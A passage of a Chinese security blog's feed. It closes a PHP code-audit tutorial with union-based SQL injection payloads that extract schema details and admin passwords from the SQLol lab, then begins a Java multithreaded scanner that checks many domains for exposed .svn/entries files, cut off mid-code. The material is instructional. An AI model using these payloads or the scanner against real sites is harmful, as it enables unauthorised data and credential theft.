&lt;p&gt;4.跟进database.inc.php，终于带入查询了，所以表单看懂了，整个过程就没过滤^ ^&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$db_conn&lt;/span&gt; = NewADOConnection(&lt;span class=&quot;variable&quot;&gt;$dsn&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;print&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;\n&amp;lt;br&amp;gt;\n&amp;lt;br&amp;gt;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;show_query&#39;&lt;/span&gt;]) &lt;span class=&quot;keyword&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;show_query&#39;&lt;/span&gt;]==&lt;span class=&quot;string&quot;&gt;&#39;on&#39;&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&quot;Query (injection string is &amp;lt;u&amp;gt;underlined&amp;lt;/u&amp;gt;): &quot;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$displayquery&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&quot;\n&amp;lt;br&amp;gt;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$db_conn&lt;/span&gt;-&amp;gt;SetFetchMode(ADODB_FETCH_ASSOC);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$results&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$db_conn&lt;/span&gt;-&amp;gt;Execute(&lt;span class=&quot;variable&quot;&gt;$query&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x04_漏洞证明&quot;&gt;0x04 漏洞证明&lt;/h2&gt;&lt;p&gt;1.有了注入点了，我们先随意输入1然后选择注射位置为Where子句里的数字，开启Seay的MySql日志监控：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol3.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;2.SQL查询语句为：SELECT username FROM users WHERE isadmin = 1 GROUP BY username ORDER BY username ASC&lt;br&gt;根据MySql日志监控里获取的sql语句判断可输出的只有一个字段，然后我们构造POC： &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;number&quot;&gt;222333&lt;/span&gt;&lt;span class=&quot;preprocessor&quot;&gt;# &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;找到输出点“222333”的位置如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol4.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;3.构造获取数据库相关信息的POC:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; union select &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;title&quot;&gt;concat&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(database()&lt;/span&gt;&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;x5c,&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;title&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt;&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;x5c,&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;title&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt;&lt;/span&gt;)#
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取数据库名（sqlol）、账户名（root@localhost）和数据库版本(5.6.12)如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol5.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;4.构造获取数据库sqlol中所有表信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;title&quot;&gt;GROUP_CONCAT&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(DISTINCT table_name)&lt;/span&gt; from information_schema.tables where table_schema&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;0x73716C6F6C&lt;/span&gt;&lt;span class=&quot;preprocessor&quot;&gt;#&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取数据库sqlol所有表信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol6.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;5.构造获取admin表所有字段信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;title&quot;&gt;GROUP_CONCAT&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(DISTINCT column_name)&lt;/span&gt; from information_schema.columns where table_name&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;0x61646D696E&lt;/span&gt;&lt;span class=&quot;preprocessor&quot;&gt;#&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取表admin所有字段信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol7.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;6.构造获取admin表账户密码的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-1 union &lt;span class=&quot;operator&quot;&gt;select &lt;span class=&quot;keyword&quot;&gt;GROUP_CONCAT&lt;/span&gt;(&lt;span class=&quot;keyword&quot;&gt;DISTINCT&lt;/span&gt; username,&lt;span class=&quot;number&quot;&gt;0x5f&lt;/span&gt;,&lt;span class=&quot;keyword&quot;&gt;password&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;admin&lt;/span&gt;#&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取管理员的账户密码信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol8.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2015/12/17/sql0/&quot;&gt;http://www.cnbraid.com/2015/12/17/sql0/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;首先恭喜Seay法师的力作《代码审计：企业级web代码安全架构》，读了两天后深有感触。想了想自己也做审计有2年了，决定写个PHP代码审计实例教程的系列，希望能够帮助到新人更好的了解这一领域，同时也作为自己的一种沉淀。大牛请自觉绕道~&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>Java基于queue的多线程提取SVN信息泄露程序</title>
    <link href="http://www.cnbraid.com/2015/12/16/svnExtract/"/>
    <id>http://www.cnbraid.com/2015/12/16/svnExtract/</id>
    <published>2015-12-16T09:35:00.000Z</published>
    <updated>2016-05-03T05:45:53.104Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;引上一篇博文，对于多线程程序来说，不管任何编程语言，生产者和消费者模型都是最经典的。就像学习每一门编程语言你首先要输出Hello World一样，都是经典的例子。这里使用queue队列作为仓储，将生产者和消费者联系起来并模拟实现一个多线程提取SVN信息泄露漏洞的程序。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/svn.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_基于Queue的多线程提取SVN信息泄露的实现&quot;&gt;0x02 基于Queue的多线程提取SVN信息泄露的实现&lt;/h2&gt;&lt;figure class=&quot;highlight java&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.io.BufferedReader;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.io.IOException;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.io.InputStream;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.io.InputStreamReader;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.net.HttpURLConnection;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.net.URL;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.net.URLConnection;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.ArrayList;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.List;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.BlockingQueue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.LinkedBlockingQueue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; ReadFiles.ReadFromFile;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; WriteFiles.WriteToFile;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * ClassName: svnExtract &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@Description&lt;/span&gt; 获取域名list中存在svn信息泄露的域名&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; HackBraid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@date&lt;/span&gt; 2015年11月4日&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;class&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;svnExtract&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;static&lt;/span&gt; BlockingQueue&amp;lt;String&amp;gt; svnQueue = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; LinkedBlockingQueue&amp;lt;String&amp;gt;();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;static&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(String[] args)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;// TODO Auto-generated method stub&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	svnExtract svnExtract=&lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; svnExtract();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;long&lt;/span&gt; startTime=System.currentTimeMillis(); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	svnExtract.svnProducer(svnQueue, &lt;span class=&quot;string&quot;&gt;&quot;C:/Users/Administrator/Desktop/domain.txt&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;long&lt;/span&gt; nextTime=System.currentTimeMillis(); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	System.out.println(&lt;span class=&quot;string&quot;&gt;&quot;生成svnQueue队列的运行时间： &quot;&lt;/span&gt;+(nextTime-startTime)+&lt;span class=&quot;string&quot;&gt;&quot;ms&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	ThreadGroup tg=&lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; ThreadGroup(&lt;span class=&quot;string&quot;&gt;&quot;svnExtract&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	svnConsumer svnConsumer=svnExtract.new svnConsumer();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;for&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;int&lt;/span&gt; i = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;; i &amp;lt; &lt;span class=&quot;number&quot;&gt;100&lt;/span&gt;; i++) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		Thread thread=&lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; Thread(tg,svnConsumer);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		thread.start();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;true&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(tg.activeCount()==&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;long&lt;/span&gt; endTime=System.currentTimeMillis(); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	System.out.println(&lt;span class=&quot;string&quot;&gt;&quot;程序总运行时间： &quot;&lt;/span&gt;+(endTime-startTime)+&lt;span class=&quot;string&quot;&gt;&quot;ms&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@Description&lt;/span&gt; 根据文件路径将文件里的url填充到svnQueue中&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@param&lt;/span&gt; svnQueue&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@param&lt;/span&gt; filePath&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@return&lt;/span&gt; svnQueue &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; HackBraid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@date&lt;/span&gt; 2015年11月4日&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;private&lt;/span&gt; BlockingQueue&amp;lt;String&amp;gt; &lt;span class=&quot;title&quot;&gt;svnProducer&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(BlockingQueue&amp;lt;String&amp;gt; svnQueue, String filePath)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	String urlTmp;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	ReadFromFile readFromFile = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; ReadFromFile();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	List urlList = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; ArrayList&amp;lt;String&amp;gt;();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	urlList = readFromFile.readFileByLines(filePath);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;for&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;int&lt;/span&gt; i = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;; i &amp;lt; urlList.size(); i++) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		urlTmp=&lt;span class=&quot;string&quot;&gt;&quot;http://&quot;&lt;/span&gt;+urlList.get(i)+&lt;span class=&quot;string&quot;&gt;&quot;/.svn/entries&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		svnQueue.offer(urlTmp);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; svnQueue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * ClassName: svnConsumer &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@Description&lt;/span&gt; 处理svnQueue中的url，判断是否存在svn信息泄露&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; HackBraid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@date&lt;/span&gt; 2015年11月4日&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;class&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;svnConsumer&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;implements&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Runnable&lt;/span&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;annotation&quot;&gt;@Override&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;true&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			String url=svnQueue.poll();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(url == &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;try&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			URL u = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; URL(url);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			URLConnection connection = u.openConnection();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			HttpURLConnection httpURLConnection = (HttpURLConnection) connection;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			httpURLConnection.setRequestProperty(&lt;span class=&quot;string&quot;&gt;&quot;Accept-Charset&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			httpURLConnection.setRequestProperty(&lt;span class=&quot;string&quot;&gt;&quot;Accept-Encoding&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;identity&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			httpURLConnection.setRequestProperty(&lt;span class=&quot;string&quot;&gt;&quot;Content-Type&quot;&lt;/span&gt;,&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					&lt;span class=&quot;string&quot;&gt;&quot;application/x-www-form-urlencoded&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			httpURLConnection.setReadTimeout(&lt;span class=&quot;number&quot;&gt;2000&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			httpURLConnection.setConnectTimeout(&lt;span class=&quot;number&quot;&gt;2000&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (((httpURLConnection.getResponseCode() == &lt;span class=&quot;number&quot;&gt;200&lt;/span&gt;)||(httpURLConnection.getResponseCode() == &lt;span class=&quot;number&quot;&gt;403&lt;/span&gt;)||(httpURLConnection.getResponseCode() == &lt;span class=&quot;number&quot;&gt;404&lt;/span&gt;))) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&lt;span class=&quot;comment&quot;&gt;//获取返回内容	&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				InputStream in = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		        InputStreamReader inr = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		        BufferedReader reader = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		        StringBuffer resultBuffer = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; StringBuffer();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		        String tempLine = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;keyword&quot;&gt;try&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 in = httpURLConnection.getInputStream();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;comment&quot;&gt;//先对数据流进行utf-8转码，解决乱码&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 inr = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; InputStreamReader(in,&lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 reader = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; BufferedReader(inr);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt;((tempLine = reader.readLine())!=&lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					 &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(tempLine.indexOf(&lt;span class=&quot;string&quot;&gt;&quot;ir&quot;&lt;/span&gt;)&amp;gt;&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;&amp;amp;&amp;amp;tempLine.length()&amp;lt;&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span 